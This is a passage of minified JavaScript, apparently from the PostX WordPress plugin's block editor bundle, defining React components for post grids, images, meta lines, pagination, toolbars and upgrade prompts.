logo",className:"logo",src:ultp_data.url+"assets/img/logo-option.svg"}),(0,o.createElement)("div",{className:"descp"},__("Need quick Human Support?","ultimate-post")),(0,o.createElement)("a",{href:"https://www.wpxpo.com/contact?utm_source=db-postx-editor&utm_medium=blocks-support&utm_campaign=postx-dashboard",target:"_blank",rel:"noreferrer"},__("Get Support","ultimate-post")))):(0,o.createElement)("div",{className:"ultp-editor-support"},(0,o.createElement)("div",{className:"ultp-editor-support-content"},(0,o.createElement)("div",{className:"title"},__("Upgrade to PostX Pro","ultimate-post")),(0,o.createElement)("div",{className:"descp"},__("Unlock all features, blocks, templates, and customization options at a single price.","ultimate-post")),(0,o.createElement)("a",{href:"https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=blocks-upgrade&utm_campaign=postx-dashboard#pricing",target:"_blank",rel:"noreferrer"},__("Upgrade Now","ultimate-post")))),kt=({tag:e,children:t,...l})=>{const a=e;return(0,o.createElement)(a,l,t)},wt=["angle_bottom_left_line","angle_bottom_right_line","angle_top_left_line","angle_top_right_line","leftAngle","rightAngle","leftAngle2","rightAngle2","collapse_bottom_line","arrowUp2","longArrowUp2","arrow_left_circle_line","arrow_bottom_circle_line","arrow_right_circle_line","arrow_top_circle_line","arrow_down_line","leftArrowLg","rightArrowLg","arrow_up_line","down_solid","right_solid","left_solid","up_solid","bottom_right_line","bottom_left_line","top_left_angle_line","top_right_line"]},38156:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{Panel:a,PanelBody:i}=wp.components;function n({children:e,open:t}){return(0,o.createElement)(a,{className:"ultp-depr-panel"},(0,o.createElement)(i,{title:"Depreciated Settings",initialOpen:t},e))}},13448:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049);const{Dropdown:i,ToolbarButton:n}=wp.components;function r({store:e,include:t,buttonContent:l,label:r}){return(0,o.createElement)(i,{contentClassName:"ultp-custom-toolbar-wrapper",renderToggle:({onToggle:e})=>(0,o.createElement)("span",null,(0,o.createElement)(n,{onClick:()=>e(),label:r},(0,o.createElement)("span",{className:"ultp-click-toolbar-settings"},l))),renderContent:()=>(0,o.createElement)(a.B3,{store:e,include:t})})}},80118:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{ToolbarDropdownMenu:a}=wp.components,i={className:"ultp-toolbar-dropdown"};function n({options:e,value:t,onChange:l,label:n}){return(0,o.createElement)(a,{popoverProps:i,icon:e.find((e=>e.value===t))?.icon||(0,o.createElement)(o.Fragment,null,"value"),label:n,controls:e.map((e=>({icon:e.icon,title:e.title,isActive:e.value===t,onClick(){l(e.value)},role:"menuitemradio"})))})}},32258:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294),a=l(53049),i=l(83100);l(74424);const{__}=wp.i18n,{BlockControls:n}=wp.blockEditor,{ToolbarGroup:r}=wp.components,{useSelect:s}=wp.data;function p({children:e,text:t,pro:l=!1,textScroll:p=!1}){const c=s((e=>e("core/preferences").get("core","fixedToolbar"))),u=l&&!ultp_data.active;return(0,o.createElement)(n,null,(0,o.createElement)("div",{className:"ultp-toolbar-group ultp-toolbar-group-bg"},t&&!c&&(0,o.createElement)("div",{className:`ultp-toolbar-group-text${c?"-bottom":""} ${p?"ultp-toolbar-text-ticker-wrapper":""}`},(0,o.createElement)("div",{className:"ultp-toolbar-group-text-inner"},__(t,"ultimate-post")+(u?" (Pro)":""))),u?(0,o.createElement)("div",{className:"ultp-toolbar-group-block"},(0,o.createElement)("div",{className:"ultp-toolbar-group-block-overlay"},(0,o.createElement)("a",{href:(0,i.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Unlock It","ultimate-post"))),(0,o.createElement)("div",{className:"ultp-toolbar-group-block-placeholder"},a.tj,a.gA,a.YG,a.Cz,a.HU)):(0,o.createElement)(r,null,e)))}},23890:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({post:e,catShow:t,catStyle:l,catPosition:a,customCatColor:i,onlyCatColor:n,onClick:r}){return e.category&&t?(0,o.createElement)("div",{className:`ultp-category-grid ultp-category-${l} ultp-category-${a}`},(0,o.createElement)("div",{className:`ultp-category-in ultp-cat-color-${i}`},e.category.map(((e,t)=>i?n?(0,o.createElement)("a",{key:t,className:`ultp-cat-${e.slug} ultp-component-simple`,style:{color:e.color||"#CE2746"},onClick:e=>{e.stopPropagation(),r()}},e.name):(0,o.createElement)("a",{key:t,className:`ultp-cat-${e.slug} ultp-cat-only-color-${i} ultp-component-simple`,style:{backgroundColor:e.color||"#CE2746"},onClick:e=>{e.stopPropagation(),r()}},e.name):(0,o.createElement)("a",{key:t,className:`ultp-cat-${e.slug} ultp-component-simple`,onClick:e=>{e.stopPropagation(),r()}},e.name))))):null}},49491:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({excerpt:e,excerpt_full:t,seo_meta:l,excerptLimit:a,showFullExcerpt:i,showSeoMeta:n,onClick:r}){return(0,o.createElement)("div",{onClick:e=>{e.stopPropagation(),r()},className:"ultp-block-excerpt ultp-component-simple",dangerouslySetInnerHTML:{__html:n?l.split(" ").splice(0,a).join(" "):i?t:e.split(" ").splice(0,a).join(" ")+"..."}})}},74904:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({filterText:e,filterType:t,filterValue:l,onClick:a}){return l=l.length>2?l:"[]",(0,o.createElement)("div",{onClick:e=>{e.stopPropagation(),a()},className:"ultp-filter-wrap ultp-disable-editor-click ultp-component","data-taxtype":t},(0,o.createElement)("ul",{className:"ultp-flex-menu"},e&&(0,o.createElement)("li",{className:"filter-item ultp-component-hover"},(0,o.createElement)("a",{className:"filter-active",href:"#"},e)),JSON.parse(l).map(((e,t)=>(e=e.value?e.value:e,(0,o.createElement)("li",{key:t,className:"filter-item ultp-component-hover"},(0,o.createElement)("a",{href:"#"},e.replace(/-/g," "))))))))}},53105:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r,m:()=>s});var o=l(67294),a=l(25335),i=l(74904),n=l(71411);function r({attributes:e,setAttributes:t,onClick:l,setSection:r,setToolbarSettings:s}){const{headingShow:p,headingStyle:c,headingAlign:u,headingURL:d,headingText:m,headingBtnText:g,subHeadingShow:y,subHeadingText:b,headingTag:v,filterShow:h,paginationShow:f,queryType:k,filterText:w,filterType:x,filterValue:T,paginationType:_,navPosition:C}=e;return(0,o.createElement)("div",{className:"ultp-heading-filter",onClick:e=>{e.stopPropagation(),l()}},(0,o.createElement)("div",{className:"ultp-heading-filter-in"},(0,o.createElement)(a.Z,{props:{headingShow:p,headingStyle:c,headingAlign:u,headingURL:d,headingText:m,setAttributes:t,headingBtnText:g,subHeadingShow:y,subHeadingText:b,headingTag:v}}),(h||f)&&(0,o.createElement)("div",{className:"ultp-filter-navigation"},h&&"posts"!=k&&"customPosts"!=k&&(0,o.createElement)(i.Z,{filterText:w,filterType:x,filterValue:T,onClick:()=>{r("filter"),s("filter")}}),f&&"navigation"==_&&"topRight"==C&&(0,o.createElement)(n.Z,{onClick:()=>{r("pagination"),s("pagination")}}))))}function s({attributes:e,setAttributes:t,onClick:l,setSection:r,setToolbarSettings:s}){const{headingShow:p,headingStyle:c,headingAlign:u,headingURL:d,headingText:m,headingBtnText:g,subHeadingShow:y,subHeadingText:b,headingTag:v,filterShow:h,paginationShow:f,queryType:k,filterText:w,filterType:x,filterValue:T,paginationType:_,navPosition:C}=e;return(0,o.createElement)("div",{className:"ultp-heading-filter",onClick:e=>{e.stopPropagation(),l()}},(0,o.createElement)("div",{className:"ultp-heading-filter-in"},(0,o.createElement)(a.Z,{props:{headingShow:p,headingStyle:c,headingAlign:u,headingURL:d,headingText:m,setAttributes:t,headingBtnText:g,subHeadingShow:y,subHeadingText:b,headingTag:v}}),(h||f)&&"posts"!=k&&"customPosts"!=k&&(0,o.createElement)("div",{className:"ultp-filter-navigation"},h&&"posts"!=k&&"customPosts"!=k&&(0,o.createElement)(i.Z,{filterText:w,filterType:x,filterValue:T,onClick:()=>{r("filter"),s("filter")}}),f&&"navigation"==_&&"topRight"==C&&(0,o.createElement)(n.Z,{onClick:()=>{r("pagination"),s("pagination")}}))))}},29236:(e,t,l)=>{"use strict";l.d(t,{A8:()=>u,E_:()=>p,En:()=>g,MV:()=>m,UU:()=>k,ZP:()=>r,_g:()=>y,kS:()=>h,nk:()=>s,qI:()=>b,w4:()=>d,xj:()=>f,y6:()=>v,zk:()=>c});var o=l(67294),a=l(64766),i=l(88640);const n=({onClick:e})=>{const{showStyleButton:t,StyleButton:l}=(0,i.Z)(e);return(0,o.createElement)("div",{className:"ultp-block-image ultp-block-empty-image",onClick:t},l)};function r({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,imgSize:n,fallbackEnable:r,vidIconEnable:p,idx:c,catPosition:u,Category:d,onClick:m,vidOnClick:g}){const{showStyleButton:y,StyleButton:b}=(0,i.Z)((e=>{e.stopPropagation(),m()}));return(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+c:""} ultp-component-simple`,onClick:y},b,(0,o.createElement)("a",{className:"ultp-component-hover"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[n]:p&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),p&&a.has_video&&(0,o.createElement)(s,{onClick:g}),d)}function s({onClick:e}){return(0,o.createElement)("div",{onClick:t=>{t.stopPropagation(),e()},className:"ultp-video-icon"},a.ZP.play_line)}function p({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,catPosition:p,Category:c,showImage:u,imgCrop:d,onClick:m}){const g=e=>{e.stopPropagation(),m()},{showStyleButton:y,StyleButton:b}=(0,i.Z)(g);return(a.image&&!a.is_fallback||r)&&u?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ":""}`,onClick:y},b,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[d]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),c):(0,o.createElement)(n,{onClick:g})}function c({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,catPosition:p,imgCropSmall:c,showImage:u,imgCrop:d,idx:m,showSmallCat:g,Category:y,onClick:b}){const v=e=>{e.stopPropagation(),b()},{showStyleButton:h,StyleButton:f}=(0,i.Z)(v);return(a.image&&!a.is_fallback||r)&&u?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ":""}`,onClick:h},f,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[0==m?d:c]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),y):(0,o.createElement)(n,{onClick:v})}function u({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,imgCropSmall:p,showImage:c,imgCrop:u,idx:d,Category:m,Video:g=null,onClick:y}){const b=e=>{e.stopPropagation(),y()},{showStyleButton:v,StyleButton:h}=(0,i.Z)(b);return(a.image&&!a.is_fallback||r)&&c?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+d:""}`,onClick:v},h,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[0==d?u:p]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),g,m):(0,o.createElement)(n,{onClick:b})}function d({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,catPosition:p,showImage:c,idx:u,showSmallCat:d,imgSize:m,Category:g,onClick:y}){const b=e=>{e.stopPropagation(),y()},{showStyleButton:v,StyleButton:h}=(0,i.Z)(b);return(a.image&&!a.is_fallback||r)&&c?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+u:""}`,onClick:v},h,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[m]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),g):(0,o.createElement)(n,{onClick:b})}function m({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,catPosition:p,showImage:c,idx:u,showSmallCat:d,imgSize:m,Category:g,onClick:y}){const b=e=>{e.stopPropagation(),y()},{showStyleButton:v,StyleButton:h}=(0,i.Z)(b);return(a.image&&!a.is_fallback||r)&&c?(0,o.createElement)("div",{className:`ultp-block-image ultp-ux-style-btn-parent ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+u:""}`,onClick:v},h,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[m]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),g):(0,o.createElement)(n,{onClick:b})}function g({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,catPosition:p,showImage:c,idx:u,showSmallCat:d,imgSize:m,layout:g,Category:y,onClick:b}){const v=e=>{e.stopPropagation(),b()},{showStyleButton:h,StyleButton:f}=(0,i.Z)(v);return(a.image&&!a.is_fallback||r)&&c?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+u:""}`,onClick:h},f,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[m]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),y):(0,o.createElement)(n,{onClick:v})}function y({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,showImage:p,idx:c,imgCrop:u,Category:d=null,Video:m=null,onClick:g}){const y=e=>{e.stopPropagation(),g()},{showStyleButton:b,StyleButton:v}=(0,i.Z)(y);return(a.image&&!a.is_fallback||r)&&p?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+c:""}`,onClick:b},v,(0,o.createElement)("a",null,(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[u]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),m,d):(0,o.createElement)(n,{onClick:y})}function b({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:n,vidIconEnable:r,showImage:s,idx:p,imgCrop:c,imgCropSmall:u,layout:d,Category:m=null,Video:g=null,onClick:y}){const{showStyleButton:b,StyleButton:v}=(0,i.Z)((e=>{e.stopPropagation(),y()}));return(a.image&&!a.is_fallback||n)&&s&&(0==p||0!=p&&"layout1"===d||"layout4"===d)?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e&&0==p?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+p:""}`,onClick:b},v,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[0==p?c:u]:r&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":n&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),g,m):null}function v({attributes:e,post:t,idx:l,VideoContent:a,CatCotent:n,onClick:r}){const{fallbackEnable:s,showImage:p,imgAnimation:c,imgOverlay:u,imgOverlayType:d,layout:m,imgCrop:g,vidIconEnable:y,imgCropSmall:b}=e,{showStyleButton:v,StyleButton:h}=(0,i.Z)((e=>{e.stopPropagation(),r()}));return(t.image&&!t.is_fallback||s)&&p&&(0==l||"layout3"==m||"layout2"==m||"layout5"==m)&&(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${c} ${!0===u?"ultp-block-image-overlay ultp-block-image-"+d+" ultp-block-image-"+d+l:""}`,onClick:v},h,0==l?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:t.title||"",src:t.image?t.image[g]:y&&t.has_video?"https://img.youtube.com/vi/"+t.has_video+"/0.jpg":s&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),a):("layout3"===m||"layout2"===m||"layout5"===m)&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:t.title||"",src:t.image?t.image[b]:y&&t.has_video?"https://img.youtube.com/vi/"+t.has_video+"/0.jpg":s&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),a),n)}function h({attributes:e,post:t,idx:l,VideoContent:a,CatCotent:n,onClick:r}){const{fallbackEnable:s,showImage:p,imgAnimation:c,imgOverlay:u,imgOverlayType:d,layout:m,imgCrop:g,vidIconEnable:y,imgCropSmall:b}=e,{showStyleButton:v,StyleButton:h}=(0,i.Z)((e=>{e.stopPropagation(),r()}));return(t.image&&!t.is_fallback||s)&&p&&(0==l||"layout3"==m||"layout2"==m||"layout5"==m)&&(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${c} ${!0===u?"ultp-block-image-overlay ultp-block-image-"+d+" ultp-block-image-"+d+l:""}`,onClick:v},h,0==l?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:t.title||"",src:t.image?t.image[g]:y&&t.has_video?"https://img.youtube.com/vi/"+t.has_video+"/0.jpg":s&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),a):("layout3"===m||"layout2"===m||"layout5"===m)&&(t.image&&!t.is_fallback||s)&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:t.title||"",src:t.image?t.image[b]:y&&t.has_video?"https://img.youtube.com/vi/"+t.has_video+"/0.jpg":s&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),a),n)}function f({imgOverlay:e,imgOverlayType:t,post:l,fallbackEnable:a,idx:i,imgCrop:n,onClick:r}){return(0,o.createElement)("div",{className:"ultp-block-image "+(!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+i:"")},(0,o.createElement)("a",{href:"#",className:"ultp-component-hover",onClick:e=>e.preventDefault()},(0,o.createElement)("img",{alt:l.title||"",src:l.image?l.image[n]:a&&ultp_data.url+"assets/img/ultp-fallback-img.png"})))}function k({children:e,onClick:t,contentHorizontalPosition:l,contentVerticalPosition:a}){const{showStyleButton:n,StyleButton:r}=(0,i.Z)(t);return(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${a} ultp-block-content-${l} ultp-component-hover`,onClick:n},r,e)}},53508:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({loadMoreText:e,onClick:t}){return(0,o.createElement)("div",{className:"ultp-loadmore ultp-component",onClick:e=>{e.stopPropagation(),t()}},(0,o.createElement)("a",{className:"ultp-loadmore-action ultp-disable-editor-click ultp-component-hover"},e))}},46896:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(64766),i=l(53049);const{__}=wp.i18n,{dateI18n:n}=wp.date;function r({meta:e,post:t,metaSeparator:l,metaStyle:r,metaMinText:s,metaAuthorPrefix:p,metaDateFormat:c,authorLink:u,onClick:d}){const m=e=>{e.preventDefault()},g=e.includes("metaAuthor")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-author ultp-component-simple ultp-block-meta-element"},(0,o.createElement)("img",{className:"ultp-meta-author-img",src:t.avatar_url})):"",y=e.includes("metaAuthor")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-author ultp-component-simple ultp-block-meta-element"},(0,o.createElement)("img",{className:"ultp-meta-author-img",src:t.avatar_url})," ",p," ",(0,o.createElement)("a",{href:u?t.author_link:"#",onClick:m},t.display_name)):"",b=e.includes("metaAuthor")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-author ultp-component-simple ultp-block-meta-element"},a.ZP.user,(0,o.createElement)("a",{href:u?t.author_link:"#",onClick:m},t.display_name)):"",v=e.includes("metaAuthor")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-author ultp-component-simple ultp-block-meta-element"},p,(0,o.createElement)("a",{href:u?t.author_link:"#",onClick:m},t.display_name)):"",h=e.includes("metaDate")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-date ultp-component-simple ultp-block-meta-element"},n((0,i.De)(c),t.time)):"",f=e.includes("metaDate")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-date ultp-component-simple ultp-block-meta-element"},a.ZP.calendar,n((0,i.De)(c),t.time)):"",k=e.includes("metaDateModified")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-date ultp-component-simple ultp-block-meta-element"},n((0,i.De)(c),t.timeModified)):"",w=e.includes("metaDateModified")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-date ultp-component-simple ultp-block-meta-element"},a.ZP.calendar,n((0,i.De)(c),t.timeModified)):"",x=e.includes("metaComments")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-comment ultp-component-simple ultp-block-meta-element "},0===t.comments?t.comments+__("comment","ultimate-post"):t.comments+__("comments","ultimate-post")):"",T=e.includes("metaComments")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-comment ultp-component-simple ultp-block-meta-element"},a.ZP.comment,t.comments):"",_=e.includes("metaView")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-view ultp-component-simple ultp-block-meta-element"},0==t.view?"0 view":t.view+" views"):"",C=e.includes("metaView")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-view ultp-component-simple ultp-block-meta-element"},a.ZP.eye,t.view):"",E=e.includes("metaTime")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-time ultp-component-simple ultp-block-meta-element"},t.post_time," ",__("ago","ultimate-post")):"",S=e.includes("metaTime")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-time ultp-component-simple ultp-block-meta-element"},a.ZP.clock,t.post_time," ",__("ago","ultimate-post")):"",P=e.includes("metaRead")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-read ultp-component-simple ultp-block-meta-element"},t.reading_time," ",s):"",L=e.includes("metaRead")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-read ultp-component-simple ultp-block-meta-element"},a.ZP.book,t.reading_time," ",s):"";return(0,o.createElement)("div",{className:`ultp-block-meta ultp-block-meta-${l} ultp-block-meta-${r}`},"noIcon"==r&&(0,o.createElement)(o.Fragment,null,v," ",h," ",k," ",x," ",_," ",P," ",E),"icon"==r&&(0,o.createElement)(o.Fragment,null,b," ",f," ",w," ",T," ",C," ",S," ",L),"style2"==r&&(0,o.createElement)(o.Fragment,null,v," ",f," ",w," ",T," ",C," ",S," ",L),"style3"==r&&(0,o.createElement)(o.Fragment,null,y," ",f," ",w," ",T," ",C," ",S," ",L),"style4"==r&&(0,o.createElement)(o.Fragment,null,b," ",f," ",w," ",T," ",C," ",S," ",L),"style5"==r&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-meta-media"},g),(0,o.createElement)("div",{className:"ultp-meta-body"},v," ",f," ",w," ",T," ",C," ",S," ",L)),"style6"==r&&(0,o.createElement)(o.Fragment,null,g," ",v," ",f," ",w," ",T," ",C," ",S," ",L))}},71411:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);const{__}=wp.i18n;function i({onClick:e}){return(0,o.createElement)("div",{onClick:t=>{t.stopPropagation(),e()},className:"ultp-next-prev-wrap ultp-disable-editor-click ultp-component"},(0,o.createElement)("ul",{className:"ultp-component-hover"},(0,o.createElement)("li",null,(0,o.createElement)("a",{className:"ultp-prev-action ultp-disable",href:"#"},a.ZP.leftAngle2,(0,o.createElement)("span",{className:"screen-reader-text"},__("Previous","ultimate-post")))),(0,o.createElement)("li",null,(0,o.createElement)("a",{className:"ultp-prev-action",href:"#"},a.ZP.rightAngle2,(0,o.createElement)("span",{className:"screen-reader-text"},__("Next","ultimate-post"))))))}},93985:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);const{__}=wp.i18n;function i({paginationNav:e,paginationAjax:t,paginationText:l="",pages:i=4,onClick:n}){const r=l.split("|"),s=r[0]||__("Previous","ultimate-post"),p=r[1]||__("Next","ultimate-post");return(0,o.createElement)("div",{onClick:e=>{e.stopPropagation(),n()},className:"ultp-pagination-wrap ultp-disable-editor-click"+(t?" ultp-pagination-ajax-action":"")+" ultp-component"},(0,o.createElement)("ul",{className:"ultp-pagination ultp-component-hover"},(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#",className:"ultp-prev-page-numbers"},a.ZP.leftAngle2,"textArrow"==e?" "+s:"")),i>4&&(0,o.createElement)("li",{className:"ultp-first-dot"},(0,o.createElement)("a",{href:"#"},"...")),new Array(i>2?3:i).fill(0).map(((e,t)=>(0,o.createElement)("li",{key:t},(0,o.createElement)("a",{href:"#"},t+1)))),i>4&&(0,o.createElement)("li",{className:"ultp-last-dot"},(0,o.createElement)("a",{href:"#"},"...")),i>5&&(0,o.createElement)("li",{className:"ultp-last-pages"},(0,o.createElement)("a",{href:"#"},i)),(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#",className:"ultp-next-page-numbers"},"textArrow"==e?p+" ":"",a.ZP.rightAngle2))))}},8152:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);const{__}=wp.i18n;function i({readMoreText:e,readMoreIcon:t,titleLabel:l="",onClick:i}){return(0,o.createElement)("div",{className:"ultp-block-readmore"},(0,o.createElement)("a",{onClick:e=>{e.stopPropagation(),i()},className:"ultp-component-simple","aria-label":l},e||__("Read More","ultimate-post"),a.ZP[t]))}},76005:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({title:e,headingTag:t,titleLength:l,titleStyle:a,onClick:i}){const n=`${t}`;if(e&&0!=l){const t=e.split(" ");e=t.length>l?t.splice(0,l).join(" ")+"...":e}return(0,o.createElement)(n,{className:`ultp-block-title ${"none"===a?"":`ultp-title-${a}`} `},(0,o.createElement)("a",{className:"ultp-component-simple",dangerouslySetInnerHTML:{__html:e},onClick:e=>{e.preventDefault(),e.stopPropagation(),i(e)}}))}},99838:(e,t,l)=>{"use strict";l.d(t,{Kh:()=>g});var o=l(53049),a=l(66464),i=l(69735);const n=(e,t,l)=>e.replace(new RegExp(t,"g"),l),r=e=>"object"==typeof e&&0!=Object.keys(e).length,s=(e,t)=>(e=e.replace(new RegExp("{{WOPB}}","g"),".wopb-block-"+t)).replace(new RegExp("{{ULTP}}","g"),".ultp-block-"+t),p=(e,t)=>{let l="";return t.forEach((e=>{l+=e+";"})),e+"{"+l+"}"},c=(e,t)=>{let l="";return t.forEach((t=>{l+=e+t})),l},u=(e,t,l,o,a=!1,i="")=>{if(o="object"!=typeof o?o:d(o).data,"string"==typeof e){if(e){if(o){let r=s(e,t);return"boolean"==typeof o?[r]:-1==r.indexOf("{{")&&r.indexOf("{")<0?[r+o]:(a&&(i||0==i)&&(r=n(r,"{{"+a+"}}","object"==typeof i?"":i)),[n(r,"{{"+l+"}}",o)])}return[]}return[s(o,t)]}const r=[];return e.forEach((e=>{r.push(n(s(e,t),"{{"+l+"}}",o))})),r},d=e=>e.openTypography?{data:(0,a.zG)(e),action:"append"}:e.openBorder?{data:(0,a.Rc)(e),action:"append"}:e.openShadow&&e.color?{data:(0,a.jE)(e),action:"append"}:void 0!==e.top||void 0!==e.left||void 0!==e.right||void 0!==e.bottom?{data:(0,a.A9)(e),action:"replace"}:e.openColor?e.replace?{data:(0,a.ro)(e),action:"replace"}:{data:(0,a.ro)(e),action:"append"}:e.openFilter?{data:(0,a.Su)(e),action:"replace"}:e.onlyUnit?{data:e._value?e._value+(e.unit||""):"",action:"replace"}:{data:"",action:"append"};function m(e,t,l,o,a,i,n,m,g,y={}){if(!((e,t,l={})=>{let o=!0;return t?.hasOwnProperty("depends")&&t.depends.forEach((t=>{let a;a=l?.id?e[l.key][l.id]?.[t.key]:e[t.key];const i=o;if("=="==t.condition)if("string"==typeof t.value||"number"==typeof t.value||"boolean"==typeof t.value)o=a==t.value;else{let e=!1;t.value.forEach((t=>{a==t&&(e=!0)})),o=e}else if("!="==t.condition)if("string"==typeof 